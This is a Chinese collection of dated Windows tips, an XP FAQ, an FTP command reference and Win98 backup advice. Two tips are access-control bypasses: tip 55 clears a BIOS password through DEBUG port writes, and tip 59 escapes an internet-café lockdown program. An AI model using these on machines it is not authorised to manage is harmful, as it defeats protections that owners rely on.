37.这个 .exe 用了哪些 .dll?　对应用程式右键单击　选 "快速检视"笔者注快速检视必须另行安装,方法如下:a. 控制台/新增或移除程式/ Win95 安装程式 /附属应用程式/详细资料b. 核取"快速检视"方块　确定
38.厌倦图形介面了吗　想念以前先进入 dos 在打 win 进窗户吗在 msdos.sys 中加入这一行BootGUI=0
39.在 win95的MS-DOS下使用长文件名
只需要在文件名前后加引号（""）即可。如：
c:\>dir "windows utilities"
c:\>cd "windows utilities"\insteasy
c:\>edit "The list of my friends.txt"
40.加快软驱传输速度
    往软盘上存贮较多资料时，让人等得真有点烦。我们不可能对软驱的机械结构进行改造，但可以通过修改系统注册表以获得较高的数据传输速度，具体方法如下：打开系统注册表编辑器，找到“HEKY-LOCAL-MACHINE\System\CurrentControlset\Services\Class\FCD\000"，在其右边的
窗口空白处，占击鼠标的右健新建一个“DWORD”值，命名为 “Fore-Fifo”，健值设定为“0”。 最后关闭注册表面化编辑器，重新启动电脑，一切就OK了！
41.MSN背景修改：
是不是觉得MSN的背景很单调呢？那么很简单，找到你喜欢的图片，估计好大小，最好是选择背景是透明的。命名为lvback.gif，找到目录C:\Program Files\Messenger，将原来图片覆盖就OK了
42.启动Winamp，并播放一首MP3
2.然后按住[SHIFT]不放，再单击面板上的“停止”按钮
3.你会发现音乐没有立即停止，而是逐渐降低音量直至完全消失，就象电台DJ做的一样
43.
1.启动QuickTime Movie Player，并打开一个mov文件
2.当它播放的时候，点击暂停按钮，然后按下[Shift]键，并双击播映窗口
3.电影开始倒放了，声音也是倒放的
44.在98下文件夹共享时，在共享名后面加个$可以把共享文件夹隐藏
45.Shift的另一个用法：
①大家经常使用Tab键、Spase键，但不知各位注意过没有，以上转换键都是顺向的，但你按住Shift不放，再用上述按键时，他的转换方向是不是倒过来了？
②在英文输入时，如果在小写状态下，按住Shift同时输入的字母为大写，反之亦然；
46.智能ABC输入法中字母 “v”的用法：
①、在智能ABC输入中，V + 数字（1～9），可以输入各种字符、图形、数字等，一试便知，奇妙无穷，但我想大多数人早都用了吧？
②、在智能ABC输入中，在输入拼音的过程中（“标准”或“双打”方式下），如果需要输入英文，可以不必切换到英文方式。键入“v”作为标志符，后面跟随要输入的英文，按空格键即可。
47.在以Word为代表的Office系列中，图形、文本框等非字符元素的位置的微调： 以Word为例，在页面中插入图形或文本框等非字符元素，在页面排版时，经常为Word固有的所进所干扰，无法达到如意的效果。在使用中，笔者摸索出以下经验，与大家分享：
①、在调整某一图片（或其他元素，以下全以图片为代）的位置时，使用鼠标或方向键将其移动到大致位置时，按住Ctrl键，再用方向键移动，你会发现现在图片每次移动的间距比原来要小得多了，在Word要求的精度下应当完全达到您的要求了。
②、在调整某一图片（或其他元素，以下全以图片为代）的大小时，不使用鼠标时，图片变化的大小不连续，按住Alt键，再调节，现在其大小就可以任意调节了
48.大伙有没有碰过电脑黑屏一现象呀？按ESC以后，桌面上是否还留有许多黑色的影子呢？特别是下面的任务栏……不用鼠标找，就黑成一条了…………可以按“开始”——“关闭计算机”——“取消”，既可恢复49.2000或者Xp下硬盘默认是共享的，即使你关闭共享，下次启动后还是会共享。想要让域内的工作站不盗窃你的个人工作成果，尝试一下建立一个批处理文件，并放在all users的startup里（或者建一个快捷方式放在里面也可以）。内容如下：
net share c$ /delete
net share d$ /delete
net share e$ /delete
50.去除Windows 2000的默认共享
修改注册表：对于各server版：在注册表编辑器（regedit.exe）中依次找到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters”，之后在其下新建一个“双字节值”，取名为“AutoShareServer”的，并将其值设为“0”。之后重新启动服务器即可。对于professional版：同上面一样 只是将AutoShareServer改为AutoShareWks
51.双击任务栏上的喇叭，如果觉得弹出音量控制面板占用桌面太打，或不能完全显示，按Ctrl+S后就会以mini方式显示，想恢复再按一次Ctrl+S就OK
52.有时会遇到引导型病毒或是光驱找不到的情况，一般在dos下执行fdisk /mbr重启就可以解决
53.在windows目录下有一个sendto文件夹
你可以把记事本的快捷方式放到里边去，然后在希望用记事本打开的文件上右键发送到中选这个记事本即可，也可以建立相应文件夹的快捷方式,比如music指向放音乐的文件夹
54.如何下载网页上的FLASH？
1 用FLASHGET的资源探索就能下载网页上的FLASH
2 到WINDOWS/Temporary Internet Files也能找到你要的FLSAH
3 用缓存拾贝这个小软件也能拿你要的FLASH
55.解决COMS锁住问题
在DOS命令行下打DEBUG
-O 70 2F
-O 71 2F
-Q
56.有时候按默认路径安装一个软件，安装时由于没有在意，事后不知安装在哪，可以通过搜索（用当日时间），时间值最大的即为新装的文件，可以看出其所在的路径
57.我们单位工作已经离不开电脑（各部门间电脑已连成网），大多数职工还不会使用电子信箱，领导要求用网络资源发放通知等。在这种情况下，笔者使用如下方法（简单，易行，不花分文）：
1.在任何一台电脑（作为邮件服务器）建立一个共享文件夹（只读），文件夹命名为“XX”（信箱含义）。
2.在其他电脑的桌面建立一个快捷键（做好影射网络资源，指向作为邮件服务器的共享文件夹），快捷键命名为“公众信箱”
3.将所有的“word”文件（通知），放在该文件夹内。
4.用户只要点击该快捷键，便可看到所有的通知了
58.ping x.x.x.x 太快!改称 ping x.x.x.x -t
59.在网吧上网被美萍锁住：在ie地址兰里输入"桌面"有50%机会打开我的电脑，利用一些东西比如文件->打开可以进行磁盘操作了
60.用笔记本与投影仪搭配使用时有三种显示模式
1.笔记本屏幕有显示、投影仪不显示；
2.笔记本屏幕、投影仪均有显示；
3.投影仪有显示、笔记本屏幕无显示.
切换方法为按 Fn 键加F3（康柏的机子是这样的，也就是加上那个上面有个小显示器图标的键啦）

XP问答
[我使用Windows XP系统，请问使用什么方法可以提高启动速度？]

    使用微软提供的“Bootvis”软件可以有效的提高Windows XP启动速度。这个工具是微软内部提供的，专门用于提升Windows XP启动速度。下载后解压缩到一个文件夹下，并在“Options”项中设置使用当前路径。之后从“Trace”项下拉菜单中选择跟踪方式。该程序会引导Windows XP重新启动，并记录启动进程，生成相关的BIN文件。之后从Bootvis中调用这个文件，从Trace项下拉菜单中选择“Optimize system”命令即可。

  [我使用Windows XP时发现，随着不断地增加、删除应用程序，磁盘可用空间不断减少，这是为什么？]

    从Windows 2000开始，Windows会在每个硬盘分区中建立一个“System Volume Information”文件夹，在该文件夹中提供的是系统默认保存的系统还原备份文件。不过Windows 2000还没有正式提供系统还原功能，在XP中，你可以看到相关的选项。为防止这个问题发生，最简单的方法就是关闭“系统还原”功能。如果要删除这个文件夹中保存的文件，你需要以Administrator（管理员）身份登录系统。

[信使服务 是WINDOWS NT/2000/XP 操作系统中自带的一个信息服务程序。用户在安装操作系统时。这个服务程序默认是打开的。]

关闭方法
1：安装PC防火墙（如天网个人防火墙，并将安全级别设为高）。
2：关闭该项服务的具体操作如下：在NT/2000/XP 操作系统的控制面板-管理工具-服务，将 alerter,messager 服务关掉即可 或进入DOS界面，输入net stop msg 和 net stop alerter 命令

[如何提高Windows XP的运行速度？]

    Windows XP虽然提供了一个非常好的界面外观，但是不可否认这样的设置也在极大程度上影响了系统的运行速度。如果你的机器运行起来速度不是很快，建议将所有的附加桌面设置取消，也就是将Windows XP的桌面恢复到Windows 2000样式。设置的方法非常简单，在“我的电脑”上单击鼠标右键，选择“属性”，在“高级”选项卡中单击“性能”项中的“设置”按钮，在关联界面中选择“调整为最佳性能”复选框即可。此外，一个对Windows XP影响重大的硬件就是内存。使用256MB内存运行Windows XP会比较流畅，512MB的内存可以让系统运行得很好。

    [我在Windows XP中设置了用户存取磁盘权限，但是后来由于不慎将用户删除，现在不能查看被加密的磁盘和文件了，怎么办？]

    Windows XP具有更高的安全性能，如果设置用户的时候使用了权限保护功能，其他用户是不能直接访问你的文件夹的，即使是系统管理员都不行。这样虽然安全，但是出了问题也是非常头痛的事情。如果你正好遇到这样的问题，必须以Administrator身份登录，然后在文件夹选项中的“View（查看）”选项卡中的“Advanced Settings（高级设置）”列表窗口中关闭“Use simple file sharing（使用简单文件共享）”复选框。之后返回相应的文件夹或者磁盘分区，在关联的菜单中选择“Properties（属性）”命令，切换到“Security（安全）”选项卡，此时可以看到其中没有允许访问的任何用户，单击“Advanced（高级）”按钮，进入高级设置界面。切换到“Owner（所有者）”选项卡，在其中如果有你的用户列表，选择它，并选择界面下边的 “Replace owner on subcontainers and objects（替换子容器及对象的所有者）”复选框，单击“Apply（应用）”添加设置，此时你可以看到在“Permissions（权限）”选项卡中看到你的名字了。当然，如果在“Permissions（权限）”
选项卡中允许你添加新的访问用户，则可以忽略上面的操作。单击“OK（确定）”按钮返回，现在就可以访问原来加密的文件夹，或者磁盘了。此外，如果你在“Pemissions”选项卡中看到了一个很长的“S-1-5-21-xxxxx”等全部是数字组成的用户，这可能就是以前创建的用户名，但是它已经损坏了，选择该用户，清除界面中的“Inherit from part the permission entries that apply to child objects. Inculde these with entries explicitly defined here（从父项继承那些可以应用到子对象的权限项目，包括那些在此明确定义的项目）”复选框。在关联的界面中选择“Copy（复制）”命令，之后可以将这个无用的用户删除。

[我安装了Windows XP，在“添加/删除程序”里没找到制作启动盘的程序，我该怎么办？]

    在Windows XP中并没有自带制作启动盘的程序，需要使用其他工具才能实现，你可以在以下地址下载到相应版本的制作工具。

    家庭版本 http://go1.163.com/xiaolh/winxp3/20020117/20020117A.htm

    高级版本 http://go1.163.com/xiaolh/winxp3/20020117/20020117B.htm

    在使用中需要注意的是，此程序做的启动盘只能供Windows XP使用，并且要使用此程序你需准备6张格式化的空白1.44MB高密度软盘，其中第一号盘就可以用来启动计算机。

    [为何我在DOS下安装Windows XP 很慢？]

    你一定没有在安装前运行smartdrv.exe,如果不运行这个，可能一个晚上你也安装不完。Smartdrv.exe在windows 98/me的光盘或是windows/command/里有。

    [为何安装过程中系统提示我必须转化分区为NTFS]

    这是因为你在windows 下安装的时候安装的不仔细，刚开始安装的时候有个高级-再安装过程中允许我选择安装到的分区。重新运行安装程序，记得选择这个，然后重新启动后就可以选择安装到的分区和是否保留原分区格式，或是格式化为NTFS OR FAT32等等。

    [为何我安装了 Windows XP 关机总是变成重起]

    这个问题是有些主板的高级电源管理不能被Windows XP支持。一般用AWARD的BIOS的主板的电脑没有这个问题，到目前为止，遇到AMI的BIOS的主板有这个问题，如技嘉的主板。解决的办法是升级你的主板的BIOS，即刷新BIOS,这是个比较危险的操作，最好请经验丰富的人来帮助你。

    [为何我的QQ在 Windows XP下运行很慢]

    这个问题好像是早期版本的QQ和Windows XP不大兼容，现在的QQ没有这个问题了。

    [为何我的Windows XP 下的Internet Explorer 运行很慢]

    如果你的机器CPU和内存够用的话，一般没这个问题。不过我发现，如果你对IE的高级选项里的东西做了改动，如一些效果等等，本来关掉这些效果为了加速IE,其实，这时就会出现IE运行很慢，尤其是显示上面的菜单和工具栏的时候。最简单的解决办法就是高级选项的面板上，点击默认，使用IE默认的设置即可。

    [为何我的 Windows XP 安装了简体中文语言包后还是英文的]

    到控制面板，地区区域选项，菜单显示，选择简体中文即可，注销后重新登录即可。如果你不选择所有用户都使用这个配置的话，你会发现，其它用户里面还是英文界面的。

    [为何MPEG4格式AVI在Windows Media Player 8.0 不能放]

    有时候用Media player放avi的时候只有声音没有图像，或是不能放，这是由于缺少解码器的原因www.divx.com 下载安装divx即可。

[不知什么原因，进不了windows。经过了n次开机后可以进入，用ghost还原c盘，当进行了90%左右就死机，重启，便显示：
em disk
Disk I/O error
Replace the disk,and then press any hey
连format也用不了，也显示上面的内容，该怎么办啊？ ]

解决方法
1. 一台电脑开机显示：em disk. Disk I/0 error,按英文的理解，应是硬盘物理上出错。用win98磁盘启动，在A：>提示下，键入sys c:回车，运行chkdsk c:/f,再运行scandisk c:，重新启动后可顺利进入win98
2.快速拯救无法正常启动Win98的方法

    开机查看，显示如下信息：
    Starting Windows 98…
Unknown Flash Type.
em disk
Disk I/O error
Replace the disk, and then Press any key.

    这是我第二次遇到同样的故障了。记得上次我曾先对硬盘进行分区、格式化，又重新安装了Windows 98系统及部分常用软件，花费了好几个钟头，尤其是安装这台机器的旧声卡驱动程序更是费了好大劲，难道这次又要重复一遍上次繁杂的步骤？一想起这些就有点不寒而栗，于
是我决定找到一个更简便的解决办法。

    我先尝试从软盘引导，成功，又试着进入C盘，用DIR命令可列出文件目录，疑是C区上的引导文件被破坏，便执行了“SYS A：C：”命令传递系统，完成后重新启动机器，故障依旧。

    我想，硬盘无法引导，一般跟硬盘的主引导扇区出了问题有很大关系，而且我还依稀记得用“FDISK/MBR”命令可修复大部分硬盘的主引导扇区，何不赶快试试！于是立即从软盘启动，先执行了“FDISK/MBR”命令，再用“SYS A：C：”传递系统文件，完成后重启电脑，C盘果然
引导成功。可遗憾的是此时只能进入DOS状态，无法继续启动Windows 98。再仔细查看系统引导文件，发现其中的MSDOS.SYS的字节数小了许多，修改此文件的属性后用EDIT查看其内容，果然少了许多命令行。我马上从另一台能正常启动的机器COPY了一个MSDOS.SYS文件，再次重
启电脑，终于出现了Windows 98的界面，而且系统也恢复如初了。

[为何安装了Windows XP后，我的其它操作系统里的Norton antivirus 2001不能用了]

    这个是由于Norton2002以前版本的Norton杀毒软件和Windows XP不兼容，而且要命的是这个不兼容是由于新版的操作系统的ntldr,ntdetect.com, 冲突造成的，如果你不用旧版的文件代替，即使删掉Windows XP也没用的。解决办法是到symantic的网站下载补丁，或是使用norton2002,目前norton antivirus 2002可以很好的在XP下运行。

    [为何PS手柄驱动不能在XP下用]

    这是手柄的驱动程序不支持XP造成的，更换手柄驱动程序可以解决www.topcmm.com下载后，如果运行setup安装不成功，用添加删除新硬件安装驱动。

    [关于局域网里Windows XP 的网上邻居不能访问的问题]

    Windows XP的安全性提高，默认不启用NBT.有时候，在局域网里使用自带的防火墙会出现的访问问题，关掉防火墙即可。

    [关于Windows XP下的显卡驱动问题]

    Windows XP自带了FOR NVIDIA系列的显卡驱动程序一般没有问题，而目前的新版的雷管XP驱动在某些机器上安装后会出现问题，建议大家使用系统自带的驱动。NVIDIA对雷管驱动已经做了更新。

    [Windows XP 安装好后，如何把FAT 32转化为NTFS]

    使用convert命令，在命令行模式下用convert.exe这个命令随时转化的。例如：convert c: /fs:ntfs把c盘转化为NTFS.

    [Windows XP下如何创建启动软盘]

    插入软盘，然后在软盘驱动器的图标上点击右键，弹出菜单选择格式化，在格式化窗口里最下边选择创建MS-DOS启动盘即可。

    [我先安装了Win XP，它没有提供双引导选项。我还想再装一个Win98，如何把Win XP的双引导菜单调出来？]

    你可在Win XP基础上直接安装Win98，完成之后只能进入Win98。此时运行Win XP的安装程序，选择“修复安装”即可。再次启动即出现双引导菜单。

    [是否所有的XP都要激活？如果不激活可不可以用？那要怎么样激活？]

    在Windows XP操作系统中，微软采用了一种“激活”技术。要求使用XP的用户在首次安装系统后的30天内，通过互联网或电话，将系统根据用户硬件配置生成的一组代码和Windows自带的序列号向微软的激活中心注册，否则XP将自动锁定。激活后如果用户多次更换系统硬件或购买新的机器后，也都必须重新激活。这项技术的实质在于保证微软授权的每一个Licence（认证）都只能在一台机器上使用，从而防止盗版商只用一个序列号就能生产出大量盗版XP的现象。

    [我的电脑是双系统，Win98在C盘，Win XP在D盘。如果要格式化C盘重装Win98，在不重装Win XP的情况下，有什么办法恢复双启动？]

    只管格式化C盘重新安装Win98好了，安装完成你会发现失去双引导菜单，而失去双引导则意味着无法启动XP。不要紧，重新运行XP的安装程序，选择“修复”安装即可。放心，“修复”安装并非意味着重新安装。

    [在局域网里如何让Windows 2000访问Windows XP？]
    先在Windows XP控制面板->用户帐号中添加新的用户，设置好权限之后就可以在Windows 2000里以新添加的用户名与密码来访问Windows XP了。如果你使用的XP是Professional版本，也可以开放guest权限，这样就不需要再新添加用户，任何机器都可以访问XP了。

[我有一个Dell的USB 9985键盘，结果在Win98的纯DOS模式下不能够使用，而在Win98和Win XP里面使用正常。怎么办？]

    USB设备一般都需要驱动的，9985键盘是USB键盘，所以要先驱动USB端口，在CMOS里面可以进行此项工作，一般CMOS中的Chipset Features里面都有USB KB/Mouse Legacy选项，选择Keyborad就可以了。有的主板可能是选择Enable或者Disable对usb 鼠标和键盘的支持。设置
成Enable能解决。

    [为何我的Modem不能在XP下工作？]

    这个主要是因为驱动程序的问题。很多Modem的Win 2000驱动程序也不能在XP下用了，不过倒是有些Modem的Win98的驱动程序可以在XP下用。

    [我现在是用的是Win Me，可以直接升级到XP吗？]

    Windows XP在升级安装上做得十分出色，它的安装方式有三种：升级安装、双系统共存安装和全新安装。我们可在以前的Windows 98/Me/NT4/2000这些操作系统的基础上顺利升级到Windows XP。注意，Win 95、Win NT 3.51以及再早一些的Windows系统是不能升级到Windows
XP的。

    [我最近碰到一个问题，当我安装好Win98后，再安装Win 2000或XP的时候，总是在拷贝完文件后跳回或是死机，为什么？]

    Win98是基于DOS的操作系统，尤其是因为要管理好内存，Win98会在CONFIG.SYS里加载HIMEM.SYS和EMM386.EXE，即使无CONFIG.SYS，Win98也会在图形界面初始化的时候加载HIMEM.SYS。而这两个管理基本内存的文件，带有多种参数，不同的配置会带来不同的内存分配环境。当然，系统过热比如风扇停转的时候，也会表现出这些症状，您应该首先检查硬件的基本情况如风扇和连线的正常与否。如果你的系统是超频的又不能正常安装话，请降低回正常的频率后再安装Win 2000和XP，成功率较高些。

    [系统关机过程中有时在屏幕显示"Saving your Settings"（保存设置）的信息时会出现死机现象]

    可从Windows升级产品目录中获得升级补丁。从StartàAll ProgramsàWindows Update中选择PersonalizeWindows Update，点击Display the Link。

    [Outlook Express ]

    当老版本的Windows操作系统升级至Windows XP后，文件及设置转移向导程序可能丢失统计数据或原有统计数据被新数据覆盖。如果在Windows9X/Me系统上运行Windows XP的Outlook Express程序，信息存储功能可能失效。 可升级补丁

    [光盘刻录]

    使用Windows XP系统刻录的光盘在Windows95/98系统操作环境或是在MP3播放器上无法读取或丢失部分文件或文件夹。 可相关升级补丁。

    [电源管理 ]

    不支持Pentium III和Athlon的CPU电源管理功能，导致使用这两种类型CPU的笔记本电脑能耗消耗较大。可升级补丁。

最近我的Windows XP系统会突然死机怎么办?

最近我的Windows XP系统会突然死机。由于一个小时就死机一次，正在编辑的文件也会因此而丢失，无法正常工作。请问有没有什么好的解决方法？

原因可能在于最近安装的软件和外设。卸载这些软件和外设、或者使用系统工具就可以解决。

    与Windows 98/98 SE/Me相比，XP不会轻易死机。即使增加常驻内存的软件，或者使用复杂的壁纸和屏保，一般也不会因此而死机。因为旨在确保系统稳定的“资源”非常充足。

    而且，即使死机，也基本上不会影响到整个系统，只要关闭有问题的软件，基本上都能顺利解决。

    但是，Windows XP也会因各种原因而导致系统不稳定，或者经常发生死机现象。

    产生这种现象的原因可能是因为个人电脑BIOS和Windows系统没有更新到最新版本。对于前者，可以参考个人电脑制造商网页，看看有没有需要下载的内容。后者则必须运行“Windows Update”，下载最新数据。

    如果这样还无法解决问题，可以从如下几点入手解决。

列出可能导致这一问题的软件和设备，重新安装驱动程序

    比如，如果安装新软件时正赶上常驻软件起动，而导致新软件无法正常安装，这种情况有时会导致死机。

    安装特定软件后系统运行马上出现不正常现象时，最好删除该软件，重新安装。

    删除软件时依次选择“开始”、“控制面板”、“添加和删除程序”选项，打开添加和删除程序窗口，然后选择删除软件即可。

    重新安装时，尽量在关闭常驻软件后再开始操作。尤其是在把防病毒软件设置为有效时，有时更容易出现无法正常安装的现象。因此，最好在安装过程中将防病毒软件设置为无效（为了防止病毒感染，在此期间必须关闭邮件软件的自动接收功能）。

    如果在安装或更新某些外设（如鼠标和扫描仪）驱动程序后，系统运行不正常，一般情况下问题出在外设的驱动程序上。

    这时有可能是安装方法不正确，或者安装了不合适的设备驱动程序。此时必须重新安装，或者恢复成原来的设备驱动程序。

    删除设备驱动程序时，依次选择“开始”按钮、“控制面板”、“系统”、“硬件”选项下的“设备管理器”按钮，打开“设备管理器”窗口，然后选择所要删除的外设，单击鼠标右键，最后点击“删除”按钮即可。

    另外，恢复成原来的设备驱动程序时，先在上述“设备管理器”窗口中选择所需外设，然后双击。接着在“设备”窗口中“设备还原”按钮即可。

使用“系统恢复”功能

    删除软件和设备驱动程序后系统运行情况仍然不正常时，可以使用“系统恢复”功能。该功能是指先设置个人电脑此前正常运行的某个日期，然后将系统恢复到当时的状态。

    如果进行系统恢复，软件及外设注册信息都将恢复到当时的状态。因此建议预先删除指定日期以后安装的软件。恢复后再重新安装这些软件。

    不过，指定日期以后输入的文档文件和数据文件不会被删除或恢复，因此用户不需担心这些文件。

    恢复系统的操作步骤如下：依次选择“开始”按钮、“全部程序”、“附件”、“系统工具”、“系统恢复”。在“将计算机恢复成以前的状态”窗口中点击“下一步”按钮。

    此时会显示日历，点击所要恢复的日期。由于可恢复的日期为粗体显示，可以从中选择。之后，点击“下一步”按钮，根据画面说明操作，最后重新起动Windows即告完成。

    如果经过上述操作仍无法解决问题，就有可能是部分Windows系统已经破坏。最后的办法就是重新安装Windows系统，或者利用恢复光盘进行系统修复。


CSS层叠样式淡化图象

《一键清理系统垃圾》

CSS层叠样式淡化图象

在<head>区域加入代码:
<style type="text/css">
<!--
    .alpha { filter: Alpha(Opacity=30,
FinishOpacity=0, Style=1, StartX=0, StartY=0,
FinishX=100, FinishY=100)}
-->
</style>

在图象连接后加代码:
<IMG SRC="images/js.jpg" class="alpha">


FTP使用精萃

《一键清理系统垃圾》

FTP使用精萃

FTP命令是Internet用户使用最频繁的命令之一，不论是在DOS还是UNIX操作系统下使用FTP，都会遇到大量的FTP内部命令。熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。
    FTP的命令行格式为： ftp -v -d -i -n -g （主机名） ，其中

-v 显示远程服务器的所有响应信息；
-n 限制ftp的自动登录，即不使用；
.n etrc文件；
-d 使用调试方式；
-g 取消全局文件名。

    ftp使用的内部命令如下(小括号表示可选项):

1.!（cmd（args））：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip.

2.$ macro-ame（args）：执行宏定义macro-name.

3.account（password）：提供登录远程系统成功后访问系统资源所需的补充口令。

4.append local-file（remote-file）：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。

6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。

8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10.cd remote-dir：进入远程主机目录。

11.cdup：进入远程主机目录的父目录。

12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如： chmod 777 a.out 。

13.close：中断与远程服务器的ftp会话(与open对应)。

14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

15.delete remote-file：删除远程主机文件。

16.debug（debug-value）：设置调试方式，显示发送至远程主机的每条命令，如： deb up 3，若设为0，表示取消debug。

17.dir（remote-dir）（local-file）：显示远程主机目录，并将结果存入本地文件local-file。

18.disconnection：同close。

19.form format：将文件传输方式设置为format，缺省为file方式。

20.get remote-file（local-file）：将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。

22.hash：每传输1024字节，显示一个hash符号(#)。

23.help（cmd）：显示ftp内部命令cmd的帮助信息，如：help get。

24.idle（seconds）：将远程服务器的休眠计时器设为（seconds）秒

25.image：设置二进制传输方式(同binary)。

26.lcd（dir）：将本地工作目录切换至dir。

27.ls（remote-dir）（local-file）：显示远程目录remote-dir，并存入本地文件local-file。

28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

29.mdelete（remote-file）：删除远程主机文件。

30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如： mdir *.o.*.zipoutfile 。

31.mget remote-files：传输多个远程文件。

32.mkdir dir-name：在远程主机中建一目录。

33.mls remote-file local-file：同nlist，但可指定多个文件名。

34.mode（modename）：将文件传输方式设置为modename，缺省为stream方式。

35.modtime file-name：显示远程主机文件的最后修改时间。

36.mput local-file：将多个文件传输至远程主机。

37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。

38.nlist（remote-dir）（local-file）：显示远程主机目录的文件清单，并存入本地硬盘的local-file。

39.nmap（inpattern outpattern）：设置文件名映射机制，使得文件传输时，文件中的某些字符相互转换，如：nmap $1.$2.$3（$1，$2）.（$2，$3），则传输文件a1.a2.a3时，文件名变为a1，a2。该命令特别适用于远程主机为非UNIX机的情况。

40.ntrans（inchars（outchars））：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。

41.open host（port）：建立指定ftp服务器连接，可指定连接端口。

42.passive：进入被动传输方式。

43.prompt：设置多个文件传输时的交互提示。

44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令，该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。

45.put local-file（remote-file）：将本地文件local-file传送至远程主机。

46.pwd：显示远程主机的当前工作目录。

47.quit：同bye，退出ftp会话。

48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.

49.recv remote-file（local-file）：同get。

50.reget remote-file（local-file）：类似于get，但若local-file存在，则从上次传输中断处续传。

51.rhelp（cmd-name）：请求获得远程主机的帮助。

52.rstatus（file-name）：若未指定文件名，则显示远程主机的状态，否则显示文件状态。

53.rename（from）（to）：更改远程主机文件名。

54.reset：清除回答队列。

55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。

56.rmdir dir-name：删除远程主机目录。

57.runique：设置文件名唯一性存储，若文件存在，则在原文件后加后缀..1，.2等。

58.send local-file（remote-file）：同put。

59.sendport：设置PORT命令的使用。

60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。

61.size file-name：显示远程主机文件大小，如：site idle 7200。

62.status：显示当前ftp状态。

63.struct（struct-name）：将文件传输结构设置为struct-name，缺省时使用stream结构。

64.sunique：将远程主机文件名存储设置为唯一(与runique对应)。

65.system：显示远程主机的操作系统类型。

66.tenex：将文件传输类型设置为TENEX机的所需的类型。

67.tick：设置传输时的字节计数器。

68.trace：设置包跟踪。

69.type（type-name）：设置文件传输类型为type-name，缺省为ascii，如：type binary，设置二进制传输方式。

70.umask（newmask）：将远程服务器的缺省umask设置为newmask，如：umask 3。

71.user user-name（password）（account）：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。

72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp服务器的所有响应都将显示给用户，缺省为on.

73.?(cmd)：同help.


备份前的准备工作非常重要：

《一键清理系统垃圾》

备份前的准备工作非常重要：

前面已经提到：安装一个全面、精炼、合理、高效、稳定、快速、健壮、优化的 Win98系统是一件不容易的事。甚至可以这么说，一个不符合上述要求的系统，是没有备份的价值的。我们在开始备份之前，就要考虑当前的 Win98系统是否符合上述要求，是否满足了个人的各项要求、习惯和爱好。因此，你应该化一些时间，把你的系统进行一次全面调试、增删和优化。如果缺乏这方面的技能，最好请高手帮你做好这项工作，主要包括：
1，转移信息 将 Win98 系统涉及个人信息的存放位置的默认值改设在非 C:盘的其它盘中。特别如 Outlook 的地址薄和往来信件、Word、Excel等的文件存放位置......等等。这样做得好处是：日后用备份恢复系统时，避免丢失重要的个人信息。
2，完善设置 每次重装 Windows 系统后，系统输入法及其热建、硬盘的 DMA 方式、端口设置、声音设置、因特网的各项设置、局域网的各项参数和共享、桌面风格设置等等都被置为系统的原始状态、而这种状态往往并不符合我们的习惯和要求。因此有必要做一次全面仔细的设置工作，为以后的“一劳永逸”打下基础。
3，安装软件 这里并不提倡将应用软件都安装在 C: 盘里。因为 C:盘以 Windos 操作系统为主，是备份的主要对象。安装内容太多，必然给备份、备份的存放和恢复工作带来很大负担；何况还要给系统留足不小于 200M 的运行空间（最好不少于600M，否则在运行 2D、3D图形软件或打开过多窗口时，特别当运行刻录软件时，将严重影响系统的速度，增大系统的不稳定因素）。综合权衡各方面利弊，建议将以下软件安装在 C: 盘里：
1〉硬件驱动程序、DirectX 等基本驱动软件。
2〉重装 Windows 系统后也必须重装的软件，如：Office、金山解霸...等。
3〉体积不大于 20M 的必备软件，如：WinZIP、WinAMP、ACDsee、上网工具、杀毒工具等等。
  不宜安装的软件 “是药三分毒”，部分软件在发挥功能的同时，有时也会产生一些有害的副作用，而这些副作用往往并不会让你马上察觉出来，但在日后的某些情况下，比如安装了新软件、启用了以前未启用的功能等，才暴露出一些莫名其妙的故障或性能低下等问题。特别是某些优化软件，片面强调或突出计算机的某项或某局部性能的提高，殊不知是牺牲了其它功能或整体综合性能为代价的。否则的话，应该让比尔.盖茨和微软的天才们下岗才对。
  由于本备份方案优点十分明显：无论是windows不健全，还是系统沾染病毒或系统垃圾文件太多等等问题发生，都可以“一恢复了之”，因此，下述软件已没有存在的价值，应不予安装：
  1〉专业反安装工具；
  2〉肯定会带来副作用的注册表优化、维护、备份软件；上网提速、硬盘提速等杂项软件。如果有必要，可在备份结束后再安装和试运行此类软件，只有在确认功效显著、无明显副作用时，才可以正式增加这些软件及其功能
4，字体文件 字体安装过多，会加大备份/恢复时的工作量， 增大备份文件的体积。应将系统本身自带字体除外的，自己加装的其它字体文件存放在非 C:盘的其它盘中。然后通过“控制面板/字体/文件/安装新字体”的功能“加挂安装”这些字体。
图1 是加挂 D:盘某文件夹下自己存放的字体的示例。务请注意：在确认前一定要将窗口下方“将字体复制到“字体”文件夹”前的方框中的勾去掉，否则系统会将你选定的字体文件在拷到 C: 盘系统文件夹中，达不到我们的目的。
5，整理菜单 整理 Win98 的“开始菜单”，首先将非 C:盘的其它盘中的应用程序一一建立各自的快捷方式，然后分类归纳，删除亢余内容，缩短过长的文件名，方便日后程序的调用。
6，硬盘卷标 为每个逻辑盘的卷标命名，特别是 C: 盘。(千万别以为无关紧要，这些卷标是唯一能在 Ghost 中被明确识别的盘符标记，是避免日后错误恢复的关键所在)，下文将有重点提及。
